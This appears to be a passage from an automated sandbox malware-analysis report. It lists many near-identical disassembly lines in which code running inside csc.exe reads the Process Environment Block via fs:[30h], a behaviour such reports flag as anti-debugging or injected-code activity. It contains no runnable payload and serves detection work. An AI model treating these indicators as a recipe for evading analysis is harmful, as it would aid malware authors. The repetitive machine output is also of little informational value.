Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EC460 mov ecx, dword ptr fs:[00000030h]	6_2_059EC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A337B6 mov eax, dword ptr fs:[00000030h]	6_2_05A337B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D7B0 mov eax, dword ptr fs:[00000030h]	6_2_0598D7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F78A mov eax, dword ptr fs:[00000030h]	6_2_05A1F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E97A9 mov eax, dword ptr fs:[00000030h]	6_2_059E97A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059607AF mov eax, dword ptr fs:[00000030h]	6_2_059607AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596C7C0 mov eax, dword ptr fs:[00000030h]	6_2_0596C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059657C0 mov eax, dword ptr fs:[00000030h]	6_2_059657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059657C0 mov eax, dword ptr fs:[00000030h]	6_2_059657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059657C0 mov eax, dword ptr fs:[00000030h]	6_2_059657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E07C3 mov eax, dword ptr fs:[00000030h]	6_2_059E07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059647FB mov eax, dword ptr fs:[00000030h]	6_2_059647FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059647FB mov eax, dword ptr fs:[00000030h]	6_2_059647FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059827ED mov eax, dword ptr fs:[00000030h]	6_2_059827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059827ED mov eax, dword ptr fs:[00000030h]	6_2_059827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059827ED mov eax, dword ptr fs:[00000030h]	6_2_059827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D7E0 mov ecx, dword ptr fs:[00000030h]	6_2_0596D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EE7E1 mov eax, dword ptr fs:[00000030h]	6_2_059EE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960710 mov eax, dword ptr fs:[00000030h]	6_2_05960710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599F71F mov eax, dword ptr fs:[00000030h]	6_2_0599F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599F71F mov eax, dword ptr fs:[00000030h]	6_2_0599F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2972B mov eax, dword ptr fs:[00000030h]	6_2_05A2972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05990710 mov eax, dword ptr fs:[00000030h]	6_2_05990710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F72E mov eax, dword ptr fs:[00000030h]	6_2_05A1F72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05965702 mov eax, dword ptr fs:[00000030h]	6_2_05965702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05965702 mov eax, dword ptr fs:[00000030h]	6_2_05965702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05967703 mov eax, dword ptr fs:[00000030h]	6_2_05967703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C700 mov eax, dword ptr fs:[00000030h]	6_2_0599C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599273C mov eax, dword ptr fs:[00000030h]	6_2_0599273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599273C mov ecx, dword ptr fs:[00000030h]	6_2_0599273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599273C mov eax, dword ptr fs:[00000030h]	6_2_0599273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959730 mov eax, dword ptr fs:[00000030h]	6_2_05959730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959730 mov eax, dword ptr fs:[00000030h]	6_2_05959730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596973A mov eax, dword ptr fs:[00000030h]	6_2_0596973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596973A mov eax, dword ptr fs:[00000030h]	6_2_0596973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DC730 mov eax, dword ptr fs:[00000030h]	6_2_059DC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05995734 mov eax, dword ptr fs:[00000030h]	6_2_05995734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05963720 mov eax, dword ptr fs:[00000030h]	6_2_05963720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F720 mov eax, dword ptr fs:[00000030h]	6_2_0597F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F720 mov eax, dword ptr fs:[00000030h]	6_2_0597F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F720 mov eax, dword ptr fs:[00000030h]	6_2_0597F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C720 mov eax, dword ptr fs:[00000030h]	6_2_0599C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C720 mov eax, dword ptr fs:[00000030h]	6_2_0599C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EE75D mov eax, dword ptr fs:[00000030h]	6_2_059EE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960750 mov eax, dword ptr fs:[00000030h]	6_2_05960750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2750 mov eax, dword ptr fs:[00000030h]	6_2_059A2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2750 mov eax, dword ptr fs:[00000030h]	6_2_059A2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E4755 mov eax, dword ptr fs:[00000030h]	6_2_059E4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599674D mov esi, dword ptr fs:[00000030h]	6_2_0599674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599674D mov eax, dword ptr fs:[00000030h]	6_2_0599674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599674D mov eax, dword ptr fs:[00000030h]	6_2_0599674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973740 mov eax, dword ptr fs:[00000030h]	6_2_05973740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973740 mov eax, dword ptr fs:[00000030h]	6_2_05973740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973740 mov eax, dword ptr fs:[00000030h]	6_2_05973740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05968770 mov eax, dword ptr fs:[00000030h]	6_2_05968770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A33749 mov eax, dword ptr fs:[00000030h]	6_2_05A33749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05964690 mov eax, dword ptr fs:[00000030h]	6_2_05964690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05964690 mov eax, dword ptr fs:[00000030h]	6_2_05964690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059576B2 mov eax, dword ptr fs:[00000030h]	6_2_059576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059576B2 mov eax, dword ptr fs:[00000030h]	6_2_059576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059576B2 mov eax, dword ptr fs:[00000030h]	6_2_059576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059966B0 mov eax, dword ptr fs:[00000030h]	6_2_059966B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D6AA mov eax, dword ptr fs:[00000030h]	6_2_0595D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D6AA mov eax, dword ptr fs:[00000030h]	6_2_0595D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C6A6 mov eax, dword ptr fs:[00000030h]	6_2_0599C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1D6F0 mov eax, dword ptr fs:[00000030h]	6_2_05A1D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059916CF mov eax, dword ptr fs:[00000030h]	6_2_059916CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A6C7 mov ebx, dword ptr fs:[00000030h]	6_2_0599A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A6C7 mov eax, dword ptr fs:[00000030h]	6_2_0599A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F6C7 mov eax, dword ptr fs:[00000030h]	6_2_05A1F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E06F1 mov eax, dword ptr fs:[00000030h]	6_2_059E06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E06F1 mov eax, dword ptr fs:[00000030h]	6_2_059E06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059936EF mov eax, dword ptr fs:[00000030h]	6_2_059936EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D6E0 mov eax, dword ptr fs:[00000030h]	6_2_0598D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D6E0 mov eax, dword ptr fs:[00000030h]	6_2_0598D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05963616 mov eax, dword ptr fs:[00000030h]	6_2_05963616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05963616 mov eax, dword ptr fs:[00000030h]	6_2_05963616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2619 mov eax, dword ptr fs:[00000030h]	6_2_059A2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE609 mov eax, dword ptr fs:[00000030h]	6_2_059DE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35636 mov eax, dword ptr fs:[00000030h]	6_2_05A35636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599F603 mov eax, dword ptr fs:[00000030h]	6_2_0599F603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05991607 mov eax, dword ptr fs:[00000030h]	6_2_05991607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E627 mov eax, dword ptr fs:[00000030h]	6_2_0597E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05996620 mov eax, dword ptr fs:[00000030h]	6_2_05996620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998620 mov eax, dword ptr fs:[00000030h]	6_2_05998620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596262C mov eax, dword ptr fs:[00000030h]	6_2_0596262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2866E mov eax, dword ptr fs:[00000030h]	6_2_05A2866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2866E mov eax, dword ptr fs:[00000030h]	6_2_05A2866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597C640 mov eax, dword ptr fs:[00000030h]	6_2_0597C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05992674 mov eax, dword ptr fs:[00000030h]	6_2_05992674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A660 mov eax, dword ptr fs:[00000030h]	6_2_0599A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A660 mov eax, dword ptr fs:[00000030h]	6_2_0599A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05999660 mov eax, dword ptr fs:[00000030h]	6_2_05999660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05999660 mov eax, dword ptr fs:[00000030h]	6_2_05999660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059FD660 mov eax, dword ptr fs:[00000030h]	6_2_059FD660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h]	6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h]	6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h]	6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
